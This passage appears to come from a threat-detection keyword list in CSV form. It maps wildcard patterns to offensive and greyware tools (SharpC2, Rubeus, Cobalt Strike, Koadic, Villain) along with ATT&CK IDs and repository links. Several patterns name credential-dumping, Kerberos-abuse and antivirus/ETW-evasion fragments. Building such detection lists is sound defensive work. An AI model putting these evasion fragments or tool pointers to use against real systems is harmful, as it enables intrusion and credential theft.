T1057,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*COM-Hunter_v*.zip*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,1,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*COM-Hunter-main*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,1,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*-command *.exe* -technique ccmstp*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*-Command Add-MpPreference -ExclusionProcess *\Program Files\FreeFileSync\Bin\*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*command_obfuscator.py*,offensive_tool_keyword,Bashfuscator,A fully configurable and extendable Bash obfuscation framework,T1027 - T1027.004 - T1059 - T1059.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Bashfuscator/Bashfuscator,1,0,N/A,10,10,1348,159,2023-09-05T10:40:25Z,2018-08-03T21:25:22Z -*command=*###---POWERSHELL---*eval $(echo *,offensive_tool_keyword,Openssh,Infecting SSH Public Keys with backdoors,T1098.003 - T1562.004 - T1021.004,TA0006 - TA0002 - TA0011,N/A,N/A,C2,https://blog.thc.org/infecting-ssh-public-keys-with-backdoors,1,0,N/A,10,9,N/A,N/A,N/A,N/A -*CommandAndControl_*.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*CommandCam.exe*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*commandovm.*.installer.fireeye*,offensive_tool_keyword,commando-vm,CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.,T1059 - T1053 - T1055 - T1070,TA0002 - TA0004 - TA0008,N/A,N/A,Exploitation OS,https://github.com/mandiant/commando-vm,1,1,N/A,N/A,10,6323,1248,2023-10-03T19:02:49Z,2019-03-26T22:36:32Z -*commando-vm-master*,offensive_tool_keyword,commando-vm,CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.,T1059 - T1053 - T1055 - T1070,TA0002 - TA0004 - TA0008,N/A,N/A,Exploitation OS,https://github.com/mandiant/commando-vm,1,1,N/A,N/A,10,6323,1248,2023-10-03T19:02:49Z,2019-03-26T22:36:32Z -*Commands/Brute.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*Commands/Createnetonly.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*Commands/DcomCommand.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/DroneCommand.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/ExecuteAssembly.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/KillProcess.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/ListProcesses.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/Logonsession.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*Commands/PowerShellImport.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/Preauthscan.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*Commands/PrintWorkingDirectory.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/PsExecCommand.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/RevToSelf.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/RunPe.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/SetSleep.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/Shell.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/ShInject.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/ShSpawn.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/Silver.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*Commands/StealToken.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/StopDrone.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/TakeScreenshot.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/WhoAmI.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/WinRmCommand.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/WmiCommand.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*commixproject/commix*,offensive_tool_keyword,commix,Automated All-in-One OS command injection and exploitation tool.,T1059 - T1053 - T1503,TA0002 - TA0003 - TA0040,N/A,N/A,Exploitation tools,https://github.com/commixproject/commix,1,1,N/A,N/A,10,4034,781,2023-09-29T06:39:41Z,2015-03-20T08:38:26Z -*common.ReflectiveDLL*,offensive_tool_keyword,cobaltstrike,Example code for using named pipe output with beacon ReflectiveDLLs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rxwx/cs-rdll-ipc-example,1,1,N/A,10,10,101,24,2020-06-24T19:47:35Z,2020-06-24T19:43:56Z -*common.ReflectiveDLL*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*common_passwords.txt*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,1,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*commonspeak_sublist.txt*,offensive_tool_keyword,AttackSurfaceMapper,AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target,T1595 - T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/superhedgy/AttackSurfaceMapper,1,0,N/A,6,10,1221,192,2023-09-11T05:26:53Z,2019-08-07T14:32:53Z -*communicate_as_backdoor_user.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*comnap_##*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*comnode_##*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*compile_implant*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*completedns-get-ns-history*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*COMPlus_ETWEnabled=0\0\0\0*,offensive_tool_keyword,ETW,stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call,T1055.001 - T1059.001 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*compress_encode_obfs*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*computers_pwdnotreqd*,greyware_tool_keyword,adfind,Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.,T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,SolarWinds Compromise,FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass,Reconnaissance,https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*comsvcs_lsass*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*ComsvcsLSASS*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*config/51pwn/CVE-*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*Confuser.CLI.Exe*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*Confuser.CLI.exe*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*Confuser.DynCipher.dll*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*Confuser.Renamer.dll*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*Connect-AzureAD -AadAccessToken -AccountId *,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,0,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*Connection refused: tcp_wrappers denial.*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*Connection refused: too many sessions for this address.*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*connormcgarr/tgtdelegation*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*conptyshell *,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - 